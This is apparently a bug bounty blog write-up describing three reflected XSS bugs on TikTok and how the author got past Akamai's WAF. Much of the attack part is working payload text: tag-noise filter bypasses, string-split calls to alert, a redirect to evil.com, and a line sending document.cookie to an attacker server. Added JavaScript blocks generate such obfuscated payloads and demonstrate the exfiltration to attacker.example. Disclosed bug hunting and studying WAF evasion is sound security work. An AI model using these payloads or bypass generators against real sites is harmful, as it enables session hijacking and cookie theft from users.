No Gaming, Just Hacking — How I Made $3K on TikTok Bug Bounty Program

TikTok Bug Bounty Program on Hackerone.com

It was just another random night. A friend of mine asked me to hop on Valorant (the game), our typical evening ritual.
But for some reason, I declined. I fired up Burp Suite instead and started poking around for bounties. Best decision ever.

Because that night, I found three bugs on TikTok that eventually earned me a total of $3,000.

The Recon Game

My journey started with simple recon. I used urlscan.io to search for any URLs related to TikTok's domains. After a bit of digging, I ended up with a massive list of roughly 10,000 URLs.

Scrolling through manually (yes, manually), I spotted an endpoint under a path that looked like a campaign sharing feature. The URL had several parameters attached to it, which immediately triggered my curiosity. (I can't share the full endpoint.)

I began playing with the region parameter. To test for reflection, I sent this harmless canary:

?region=id'"><u>testest</u>

And guess what?

It reflected cleanly. No sanitization. No encoding. The canary mixes a single quote, a double quote, a closing angle bracket and a harmless tag, so a single request tells you which of those characters survive untouched, and that decides which injection contexts are reachable.
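That reflection check is worth automating once the candidate list is 10,000 URLs long. The following is an added example and not code from the original write-up: it takes a response body and the canary used in the post and classifies the reflection as raw (what the author found), fully HTML-entity-encoded, partially encoded (quotes escaped but angle brackets not, which is still worth a look), or absent. The sample bodies are constructed, not real TikTok responses, and the function and sample names are my own.

```javascript
// Added example, not part of the original post. Classifies how a reflected
// canary came back. Sample bodies below are constructed, not real responses.

const CANARY = `id'"><u>testest</u>`; // the canary from the write-up

// Minimal HTML entity encoder for the characters that matter for XSS.
function htmlEncode(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Different encoders emit different entities for the same character;
// fold the common variants so comparisons below are stable.
function canonicalEntities(s) {
  return s
    .replace(/&#x27;|&apos;/gi, '&#39;')
    .replace(/&#x3c;|&#60;/gi, '&lt;')
    .replace(/&#x3e;|&#62;/gi, '&gt;')
    .replace(/&#x22;|&#34;/gi, '&quot;');
}

function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Pattern that matches the canary with each special character either raw or
// entity-encoded, so a half-escaped reflection is still detected.
function flexiblePattern(canary) {
  const alt = {
    '&': '(?:&|&amp;)', '<': '(?:<|&lt;)', '>': '(?:>|&gt;)',
    '"': '(?:"|&quot;)', "'": "(?:'|&#39;)",
  };
  return new RegExp([...canary].map((c) => alt[c] || escapeRegex(c)).join(''));
}

// Returns 'raw' | 'html-encoded' | 'partially-encoded' | 'absent'.
function classifyReflection(body, canary = CANARY) {
  if (body.includes(canary)) return 'raw'; // no encoding at all: interesting
  const norm = canonicalEntities(body);
  if (norm.includes(htmlEncode(canary))) return 'html-encoded';
  if (flexiblePattern(canary).test(norm)) return 'partially-encoded';
  return 'absent';
}

// Constructed sample responses (hypothetical; not TikTok output).
const SAMPLES = {
  raw: `<a href="/share?region=id'"><u>testest</u>">share</a>`,
  encoded: `<a href="/share?region=id&#x27;&quot;&gt;&lt;u&gt;testest&lt;/u&gt;">share</a>`,
  partial: `<p>region: id&#39;&quot;><u>testest</u></p>`,
  absent: `<p>region: unknown</p>`,
};

for (const [name, body] of Object.entries(SAMPLES)) {
  console.log(name, '->', classifyReflection(body));
}
```

Only the raw class means what the post found; the partially-encoded class is the one people miss when they grep for the canary verbatim, because a server that escapes quotes but not angle brackets still leaves a tag injection in text context.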

Enter the WAF — Akamai

I thought to myself, “Okay… this might be interesting.” So I tested with a classic payload:

"><img src=x onerror=alert(document.domain)>

Blocked by Akamai, TikTok's WAF. And not just any WAF… a hard one.

Game on.

The Bypass Attempts

I started digging into Akamai WAF bypass techniques and found some good articles on string obfuscation, case sensitivity, and tag evasion.

Some common attempts included:

</ScRiPt>      → blocked
</SCRIPT>      → blocked
</ScRpt>       → not blocked, but not a real script tag either, so the browser ignores it
</Script+xxx>  → bypassed briefly, but eventually got filtered again

The +xxx variant works because the payload travels in a URL query string: most server stacks decode a bare + as a space, so the browser receives </Script xxx>, and HTML ignores anything after the tag name in an end tag. A filter matching on the literal tag name, meanwhile, sees script followed by a character it does not expect.

I knew I needed something more creative.

Payload Evolution

After multiple failed tries, I came up with this weird-looking but effective bypass string. The <x> tags, the empty comment <!--> and the bogus comment <!> are noise the browser's parser tolerates but that breaks up what a pattern-matching filter sees:

}<x>xxx<!--><!>+>+></Script+xxx></script%20x></x><x>xxx<!--><!>+>+>

This got through the filter, but requests containing alert(), confirm(), or prompt() were still blocked. So I played it safe and reported the bug first with a payload that only redirected the page via location.replace(), proving script execution without any of the blocked functions, to avoid being beaten to it by a duplicate submission.

The full payload was a bit wild and looked something like this. The two Object.prototype lines look like the published prototype-pollution gadget for Akamai's Boomerang (BOOMR) script; what actually proves execution in this PoC is the location.replace() call:

}<x>xxx<!--><!>+>+></Script+xxx><Script+xxx>Object.prototype.BOOMR = 1;
Object.prototype.url = 'https://portswigger-labs.net/xss/xss.js';
location.replace('https://evil.com');</script%20x></x><x>xxx<!--><!>+>+>

Two days later, I got a response from HackerOne Triage:

Crafting a Real XSS

I went back to the drawing board. Since a direct alert() was blocked, I tried breaking it up with obfuscated property access, a comment between the object and the bracket plus a string-concatenated property name:

window/*xxx*/ ;

Full payload:

<x>xxx<!--><!>+>+></Script+xxx><script%20x>window/*xxx*/['al'%2b'ert'](1);//</script%20x></x><x>xxx<!--><!>+>+>

That worked. Note the %2b: a literal + in the query string would have been decoded to a space, turning 'al'+'ert' into 'al' 'ert' and breaking the concatenation. I updated my PoC and sent it again.

The internal triage team replied:

Challenge accepted.

I moved on to demonstrating cookie theft with this final payload (same trick: comments and split strings for window.location and document.cookie):

window/*xxx*/['loca' + 'tion'] = 'http://<your-server>?cookie=' + document/*xxx*/['coo' + 'kie'];

Boom. Valid XSS confirmed, and later the same day a $1,000 reward dropped in. (Cookie exfiltration like this only captures cookies without the HttpOnly flag; the impact argument for reflected XSS holds either way, since the script runs in the victim's origin.)
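To make the two obfuscation payloads above (the 'al'+'ert' call and the 'coo'+'kie' exfiltration) concrete, here is an added example that is not part of the original post. It generates the window/*xxx*/['pa'+'rt'] form from a plain name, checks it against a toy signature regex that stands in for an unknown WAF rule (an assumption on my part, not Akamai's logic), and executes the result against stub window and document objects to show it still reaches the real function or property. It also demonstrates the query-string decoding pitfall behind the %2b in the earlier payload. attacker.example and victim.example are placeholder hosts; the stub cookie value is constructed.

```javascript
// Added example, not from the original write-up. Shows why the post's
// window/*xxx*/['al'+'ert'](1) and document/*xxx*/['coo'+'kie'] payloads
// still reach the real targets while containing none of the literal tokens
// a string-matching rule keys on. TOY_SIGNATURE is an assumed stand-in for
// "some WAF rule", not Akamai's logic; window/document are constructed stubs
// because Node has no DOM.

// Assumption: a naive rule keyed on the literal call or property name.
const TOY_SIGNATURE = /\b(alert|confirm|prompt)\s*\(|document\s*\.\s*cookie/i;

// "alert" -> 'al'+'ert', "cookie" -> 'coo'+'kie', "location" -> 'loca'+'tion'
// (split at the midpoint, which matches the splits used in the post).
function splitIdentifier(name) {
  const cut = Math.max(1, Math.floor(name.length / 2));
  return `'${name.slice(0, cut)}'+'${name.slice(cut)}'`;
}

// obj/*xxx*/['pa'+'rt']: a comment between object and bracket is legal JS
// but defeats "obj." / "obj[" token matching.
function obfuscatedAccess(objName, propName) {
  return `${objName}/*xxx*/[${splitIdentifier(propName)}]`;
}

function obfuscatedCall(objName, propName, argsSource) {
  return `${obfuscatedAccess(objName, propName)}(${argsSource})`;
}

function obfuscatedAssign(objName, propName, valueSource) {
  return `${obfuscatedAccess(objName, propName)} = ${valueSource}`;
}

// Run a payload against stub window/document objects and report what it
// touched: the expression's value, recorded calls, and the final location.
function runPayload(source) {
  const calls = [];
  const win = {
    alert: (x) => { calls.push(['alert', x]); return 'alerted'; },
    location: 'https://victim.example/share', // constructed starting URL
  };
  const doc = { cookie: 'session=constructed-sample' }; // constructed cookie
  const result = new Function('window', 'document', `return (${source});`)(win, doc);
  return { result, calls, location: win.location };
}

// The pitfall behind the %2b in the post: a bare "+" in a query string is
// decoded as a space by form-urlencoded parsers (URLSearchParams behaves
// like most server stacks here), which would wreck 'al'+'ert'.
function decodeQueryParam(rawQuery, name) {
  return new URLSearchParams(rawQuery).get(name);
}

function queryEncode(value) {
  return encodeURIComponent(value); // "+" -> %2B, space -> %20
}

// Stand-alone demo.
const call = obfuscatedCall('window', 'alert', '1');
console.log(call, '| signature hit:', TOY_SIGNATURE.test(call), '|', runPayload(call));
const exfil = obfuscatedAssign(
  'window', 'location',
  `'http://attacker.example/?cookie=' + ${obfuscatedAccess('document', 'cookie')}`,
);
console.log(exfil, '| signature hit:', TOY_SIGNATURE.test(exfil), '|', runPayload(exfil).location);
console.log(decodeQueryParam("region='al'+'ert'", 'region'), '<- bare + became a space');
console.log(decodeQueryParam("region='al'%2b'ert'", 'region'), '<- %2b survives');
```

The point of the stub run is that the obfuscation changes only what the request looks like in transit; the JS engine sees the same property lookup as the plain form, which is why a rule that matches source text rather than parsed semantics cannot keep up with it.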

Bonus Round: Two More Bugs

After this win, I kept digging through other endpoints in the same path family and eventually found two more with the identical vulnerability.

Same technique. Same XSS. Same reward: $1,000 each.

💸 The Final Tally

  • First bug: $1,000
  • Second bug: $1,000
  • Third bug: $1,000

➡️ Total: $3,000

And I didn't even need to play Valorant that night.

Final Thoughts for Fellow Hackers

Bug bounty isn't just about skill; it's about patience, recon, creativity, and timing. Sometimes saying "no" to a game invite can leave you a few thousand dollars richer 😂

To all the hunters out there: never underestimate a reflected parameter. The simplest bugs can lead to the most unexpected rewards if you know how to craft your payloads right.

Keep learning, stay safe.

Happy hacking.

./Logout.
